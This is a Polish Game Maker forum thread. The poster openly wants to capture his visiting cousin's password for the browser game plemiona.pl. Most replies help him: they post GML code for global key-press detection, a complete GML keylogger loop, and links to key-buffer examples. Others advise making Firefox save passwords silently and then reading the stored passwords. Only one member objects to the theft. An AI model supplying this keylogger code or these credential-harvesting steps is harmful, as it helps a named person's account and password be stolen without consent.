XxMichałxX Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 Chcę zrobić keyloggera bo niedługo kuzyn przyjedzie i będzie się na plemiona.pl logował, tylko problem w tym, że moge sobie zrobić zmienną text i text=keyboard_string ale tylko bedzie sie wtedy zapisywac gdy bedzie okno z grą włączane a gdyby bylo keyboard_string_direct to by nie trzeba było miec aktywne okno. Da sie jakos tak zrobic? Bo przeciez nie bede robic do kazdego klawisza if keyboard_check_direct i w dodatku jak jest check to raz nacisne a sie trzy litery pojawia jak ciut dluzej przytrzymam a juz pressed_direct tez nie ma. No i czy da sie zobic ukryte okno i sie pokaze spowrotem jak sie wcisnie jakąś kombinacje klawiszy? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Dawidds Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 Widzisz, np. keylogger łatwiej w cpp napisać niż w gmie. ...no w sumie to nie. Ale nawet w Gmie trzeba nad tym pomyśleć. keyboard_check_direct() wystarcza. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 12 Lutego 2009 Autor Udostępnij Opublikowano 12 Lutego 2009 no a jak zrobic zeby sie 3 litery na raz nie wpisywały jak ciut dluzej przytrzymam? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Administratorzy gnysek Opublikowano 12 Lutego 2009 Administratorzy Udostępnij Opublikowano 12 Lutego 2009 Włącz zapamiętywanie haseł bez pytania w przeglądarce i tyle. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 kiedyś napisałem taki skrypcik o nazwie "keyboard_check_direct_pressed" oto on: GML (keyboard check direct pressed) if ( variable_local_array_get( 'press' , argument0 ) = 0 ) press[ argument0 ] = -1 if ( keyboard_check_direct( argument0 )) { if ( press[ argument0 ] = -1 ) press[ argument0 ] = true } else press[ argument0 ] = -1 if ( press[ argument0 ] == true ) return true else return false oraz drugi ("direct_pressed_end") również potrzebny: GML (directpressedend) press[ argument0 ] = noone użycie takiego skryptu wygląda tak: if ( keyboard_check_direct_pressed( ord( 'A' )) == true ) { //akcje direct_pressed_end( ord( 'A' )); - nie zapomnij tego użyć, to informuje system, że klawisz został wciśnięty. } Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 12 Lutego 2009 Autor Udostępnij Opublikowano 12 Lutego 2009 co? w jakiej przeglądarce? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Administratorzy gnysek Opublikowano 12 Lutego 2009 Administratorzy Udostępnij Opublikowano 12 Lutego 2009 co? w jakiej przeglądarce? A co, w plemiona nie gra się przez przeglądarkę? Btw.: http://hurkel.gmclan.org/tymon/?path=gamem...ute_keybuff.gm6 lub http://hurkel.gmclan.org/tymon/?path=gamem...with_numkey.gm6 Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
adam014 Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 Da się chyba to zrobić na keyboard_string,ale trzeba użyć wątków. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Dawidds Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 Da się chyba to zrobić na keyboard_string,ale trzeba użyć wątków.-.- Sprawdzałeś? co? w jakiej przeglądarce?Wchodzisz w opcje firefoxa i wyłączasz pytanie się o zapamiętanie hasła. I nie potrzebujesz keyloggera. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Cekol Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 Heh. Ostatnio też zacząłem robić sobie keyloggera, ponieważ żaden z internetu mnie nie zadowalał... Jako to, że kodem lubie sie dzielić, pokaże jakim ja sposobem robię keyloggera w gm. W Create: GML text="" text_pressed="" W Step: GML chair_table="ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 " chair_numbers=string_length(chair_table) //show_message(string(chair_table)+" "+string(chair_numbers)) for(a=0;a<=chair_numbers;a+=1) { var key_pressed; key_pressed=0; chair_current= string_char_at(chair_table,a) if keyboard_check_direct(ord(chair_current)) key_pressed=1 chair_pressed=string_pos(chair_current,text_pressed) if chair_pressed=0 && key_pressed=1 { text_pressed+=string(chair_current) text+=string(chair_current) } if chair_pressed!=0 && key_pressed=0 { text_pressed=string_replace_all(text_pressed,chair_current," ") } } Na razie działa to tylko na litery i cyfry, bez wielkosci liter. i o to cały keylogger :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 12 Lutego 2009 Udostępnij Opublikowano 12 Lutego 2009 to sprawdzaj dodatkowo shift :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Filar Społeczności Ranmus Opublikowano 12 Lutego 2009 Filar Społeczności Udostępnij Opublikowano 12 Lutego 2009 @autor: Nie wstyd Tobie kraść konto kuzynowi? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 13 Lutego 2009 Autor Udostępnij Opublikowano 13 Lutego 2009 Wchodzisz w opcje firefoxa i wyłączasz pytanie się o zapamiętanie hasła. I nie potrzebujesz keyloggera. Fajnie i moge sie na jego konto zalogować, ale nie znam hasła -,- Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 13 Lutego 2009 Udostępnij Opublikowano 13 Lutego 2009 plik > ustawienia > bezpieczeństwo > pokaż zapamiętane hasła :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Tymon Opublikowano 13 Lutego 2009 Udostępnij Opublikowano 13 Lutego 2009 Może ktoś podał, ale co mi tam, kiedyś napisałem coś takiego: http://hurkel.gmclan.org/tymon/?path=gamem...ute_keybuff.gm6 http://hurkel.gmclan.org/tymon/?path=gamem...with_numkey.gm6 Użyteczne draństwo. :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się